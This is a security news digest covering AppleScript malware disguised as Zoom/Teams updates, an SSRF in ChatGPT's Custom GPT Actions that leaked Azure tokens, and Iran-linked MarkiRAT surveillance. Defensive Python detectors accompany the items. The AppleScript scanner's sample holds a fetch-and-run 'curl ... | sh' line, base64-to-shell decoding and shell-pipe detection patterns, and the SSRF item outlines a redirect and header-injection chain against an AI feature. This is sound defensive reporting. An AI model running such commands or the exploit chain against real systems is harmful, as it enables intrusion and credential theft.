AppleScript Malware Masquerades as Zoom and Teams Updates to Bypass macOS Defenses
Threat actors are increasingly exploiting AppleScript (.scpt) files to distribute macOS malware disguised as legitimate updates for applications, including Zoom and Microsoft Teams. Following Apple’s August 2024 removal of the Gatekeeper “right-click and open” override, attackers shifted to this delivery method to recover the execution rates their earlier lures had relied on. The scripts, often embedded with malicious commands, are disguised as credible documents or update installers and rely on social engineering to convince users to open them and manually run them in Script Editor, a legitimate macOS application. Once executed, these scripts can deploy credential stealers, including Odyssey Stealer or MacSync Stealer, exfiltrating sensitive user data under the guise of trusted software updates. The technique’s sophistication lies in custom icons and resource forks, which allow the scripts to appear as ordinary files when delivered in ZIP or DMG archives, evading visual detection and most antivirus scans. VirusTotal analyses confirm that many samples currently register zero detections, emphasizing the stealth of this approach. Security researchers have identified widespread phishing campaigns using fake Teams and Zoom SDK updates, as well as bogus financial documents, to deliver these payloads. Defenders should mitigate risk by changing the default application for .scpt files away from Script Editor and monitoring for obfuscated shell commands or AppleScript event codes. As this attack method continues to proliferate, it signals a growing adaptation of APT-grade macOS tradecraft in mainstream criminal operations.
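The monitoring advice above can be turned into a simple triage check over decompiled AppleScript source (for example the text output of `osadecompile`). This is an added example, not code from the original report; the indicator patterns, the two sample scripts and the risk thresholds are this example's own constructed choices.

```python
import re

# Constructed samples: a benign script and one shaped like the disguised
# "update" scripts described above (example input, not a real sample).
BENIGN = 'display dialog "Zoom is up to date" buttons {"OK"}'
SUSPICIOUS = '''
-- looks like an updater, but hands control to a shell
set payload to "ZWNobyBoZWxsbw=="  -- base64 for: echo hello
do shell script "echo " & payload & " | base64 -d | sh"
«event sysoexec» "curl -fsSL https://example.invalid/u | sh"
set hidden to (ASCII character 111) & (character id 115)
'''

# Indicators for "obfuscated shell commands or AppleScript event codes".
# These patterns are this example's own choices, not a published rule set.
INDICATORS = {
    "shell_exec": re.compile(r"\bdo shell script\b", re.IGNORECASE),
    # raw Apple event form of `do shell script`; hides the readable keyword
    "raw_event_code": re.compile(r"«event\s+sysoexec»"),
    "base64_decode": re.compile(r"\bbase64\s+(-d|-D|--decode)\b"),
    "fetch_to_shell": re.compile(r"\b(curl|wget)\b[^\n]*\|\s*(sh|bash|zsh)\b"),
    # strings assembled from character codes are a common obfuscation
    "char_assembly": re.compile(r"\b(ASCII character|character id)\s+\d+", re.IGNORECASE),
    "admin_prompt": re.compile(r"\bwith administrator privileges\b", re.IGNORECASE),
}

def scan_applescript(source: str) -> dict:
    """Return {indicator: hit_count} for every indicator found in source."""
    hits = {}
    for name, pattern in INDICATORS.items():
        count = len(pattern.findall(source))
        if count:
            hits[name] = count
    return hits

def risk_level(hits: dict) -> str:
    """Coarse triage: a shell launch plus any obfuscation indicator is 'high'."""
    launches = {"shell_exec", "raw_event_code"}
    obfuscation = {"base64_decode", "fetch_to_shell", "char_assembly"}
    if hits.keys() & launches and hits.keys() & obfuscation:
        return "high"
    if hits.keys() & launches:
        return "medium"
    return "low"

if __name__ == "__main__":
    for label, src in (("benign", BENIGN), ("suspicious", SUSPICIOUS)):
        print(f"{label}: {risk_level(scan_applescript(src))} {scan_applescript(src)}")
```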
Researcher Exploits SSRF in ChatGPT’s Custom GPT Actions to Access Azure Cloud Tokens
A researcher has found a server-side request forgery (SSRF) vulnerability in ChatGPT’s Custom GPTs “Actions” feature that allowed the service to follow user-supplied API endpoints and retrieve internal metadata. The researcher discovered the issue while configuring a custom GPT action and used an allowed HTTPS endpoint that redirected to the platform’s internal metadata service, bypassing the feature’s HTTPS restriction. When the redirected request reached the metadata service, it initially failed because the service required a specific header; the researcher then abused the feature’s authentication settings to inject that header by creating a custom authentication field with the required name and value. That sequence returned instance metadata and produced an access token tied to the hosting environment’s management API, which would allow an attacker to query or provision cloud resources. The exploit chain required only a small number of creative steps, underscoring how the interaction of permissive redirects, header handling, and user-controlled API configuration can lead to high-impact credential exposure. The root weaknesses were permissive redirect handling, insufficient validation of user-supplied authentication fields, and overly permissive outbound request behavior from a feature designed for convenience. Recommended mitigations include strict validation and allow-listing of external endpoints, blocking or canonicalizing redirects that resolve to internal addresses, and disallowing header injection from user-provided authentication fields. Operators should also enforce stronger protections for cloud metadata services, adopt the most secure metadata service modes available, apply least privilege to service identities, and rotate credentials if any exposure is suspected. Additional defensive measures are egress filtering, outbound request auditing, and explicit threat modelling for any feature that bridges user content with cloud APIs.
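The three root weaknesses above map onto three checks an outbound-fetch layer can enforce: re-validating the target on every redirect hop, refusing hosts that resolve to non-global addresses, and refusing user-supplied header names that metadata services rely on. This is an added example and not OpenAI's code; the blocked header names are the well-known ones for Azure IMDS ("Metadata"), GCP ("Metadata-Flavor") and AWS IMDSv2, and the DNS/HTTP stubs and the `api.example.com` endpoints are constructed so the example runs offline.

```python
import ipaddress
from urllib.parse import urlsplit

# Header names that cloud metadata services require (Azure IMDS needs
# "Metadata: true"; GCP and AWS have their own). A user-configured
# authentication field must never be allowed to set them.
BLOCKED_HEADERS = {"metadata", "metadata-flavor", "x-aws-ec2-metadata-token", "host"}

def check_auth_header(name: str) -> None:
    if name.strip().lower() in BLOCKED_HEADERS:
        raise ValueError(f"user-supplied header {name!r} is not permitted")

def check_url(url: str, resolver) -> None:
    """Allow only https to a host that resolves to a globally routable address."""
    parts = urlsplit(url)
    if parts.scheme != "https" or not parts.hostname:
        raise ValueError(f"only https URLs with a host are allowed: {url}")
    host = parts.hostname
    try:
        addr = ipaddress.ip_address(host)        # literal IP in the URL
    except ValueError:
        addr = ipaddress.ip_address(resolver(host))
    if not addr.is_global:                       # private, loopback, link-local, ...
        raise ValueError(f"{host} resolves to non-public address {addr}")

def fetch_action(start_url: str, headers: dict, fetch, resolver, max_hops: int = 5):
    """Re-check every hop: validating only the first URL is what let the
    redirect reach the metadata service."""
    for name in headers:
        check_auth_header(name)
    url = start_url
    for _ in range(max_hops):
        check_url(url, resolver)
        status, location, body = fetch(url, headers)
        if status not in (301, 302, 303, 307, 308):
            return body
        url = location
    raise ValueError("too many redirects")

# Constructed stand-ins for DNS and HTTP so the example runs offline.
STUB_DNS = {"api.example.com": "93.184.216.34"}
def stub_resolver(host):
    return STUB_DNS[host]

def stub_fetch(url, headers):
    if url == "https://api.example.com/ok":
        return 200, None, "ok"
    if url == "https://api.example.com/bounce":
        return 302, "https://169.254.169.254/metadata/instance", None
    return 200, None, "metadata"   # would be the leak if ever reached

if __name__ == "__main__":
    print(fetch_action("https://api.example.com/ok", {"X-Api-Key": "k"}, stub_fetch, stub_resolver))
```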
Ferocious Kitten APT Expands Surveillance with MarkiRAT Keylogging and Clipboard Theft
The Ferocious Kitten advanced persistent threat (APT) group, active since at least 2015 and linked to Iranian state interests, continues to conduct cyber-espionage campaigns against Persian-speaking dissidents and activists. The group leverages politically themed spear-phishing lures containing weaponized Microsoft Office documents embedded with malicious macros to deploy its custom malware, MarkiRAT. Once executed, MarkiRAT establishes persistence and begins extensive surveillance, recording keystrokes, clipboard content, screenshots, and stored credentials, while exfiltrating data over HTTP/HTTPS channels. Analysts from Picus Security noted that recent variants hijack legitimate apps like Telegram and Chrome, embedding the implant alongside them so that both the malware and the legitimate software run seamlessly, reducing suspicion among victims. MarkiRAT’s operators demonstrate strong defense evasion and collection tradecraft, including use of the Right-to-Left Override (RTLO) Unicode trick to disguise executable files as media content. The malware further targets credential stores, including KeePass and PGP key files, forcing users to re-enter passwords so they can be logged. It also performs system reconnaissance to detect security tools, including Kaspersky and Bitdefender. The campaign’s precision targeting and consistent infrastructure indicate a long-term focus on surveillance and information control. Ferocious Kitten remains one of Iran’s most persistent domestic monitoring threats, continuously refining its social engineering and malware deployment to maintain visibility into the communications of opposition figures and diaspora communities.
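The RTLO trick mentioned above works because a file manager renders everything after U+202E right-to-left, so the real extension ends up in the middle of the displayed name. The following added example (not code from Picus or the report) shows how a mail gateway or EDR rule could flag such names: it lists the bidi controls present, recovers the true extension, and approximates the displayed name. The rendering is a deliberate simplification of the Unicode bidi algorithm for ASCII names, and the sample filename is constructed.

```python
import os

# Unicode bidirectional controls that can reorder how a filename is drawn.
BIDI_CONTROLS = {"\u202e": "RLO", "\u202d": "LRO", "\u202b": "RLE", "\u202a": "LRE",
                 "\u2066": "LRI", "\u2067": "RLI", "\u2068": "FSI"}
EXECUTABLE_EXT = {".exe", ".scr", ".com", ".bat", ".cmd", ".js", ".vbs", ".lnk", ".ps1"}

def rendered_name(name: str) -> str:
    """Approximate how a file manager displays the name: text after an RLO
    (U+202E) is drawn right-to-left until a PDF (U+202C) or end of string.
    Simplified bidi handling, adequate for ASCII filenames."""
    out, i = [], 0
    while i < len(name):
        ch = name[i]
        if ch == "\u202e":
            j = name.find("\u202c", i + 1)
            if j == -1:
                j = len(name)
            out.append(name[i + 1:j][::-1])
            i = j + 1
        elif ch in BIDI_CONTROLS or ch == "\u202c":
            i += 1                     # the controls themselves are invisible
        else:
            out.append(ch)
            i += 1
    return "".join(out)

def inspect_filename(name: str) -> dict:
    """Flag names whose true extension is executable but displays as something else."""
    controls = [BIDI_CONTROLS[c] for c in name if c in BIDI_CONTROLS]
    clean = "".join(c for c in name if c not in BIDI_CONTROLS and c != "\u202c")
    actual_ext = os.path.splitext(clean)[1].lower()
    shown = rendered_name(name)
    shown_ext = os.path.splitext(shown)[1].lower()
    return {
        "controls": controls,
        "actual_extension": actual_ext,
        "displayed_as": shown,
        "suspicious": bool(controls) and actual_ext in EXECUTABLE_EXT and shown_ext != actual_ext,
    }

if __name__ == "__main__":
    for name in ("vacation.jpg", "vacation\u202egpj.exe"):   # constructed samples
        print(inspect_filename(name))
```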
Patch Tuesday
Patch Tuesday – Microsoft has released its latest updates, addressing multiple security vulnerabilities across Windows, Microsoft Office, and other supported products. These updates include fixes for both critical and important severity issues that could allow remote code execution, privilege escalation, or information disclosure if left unpatched.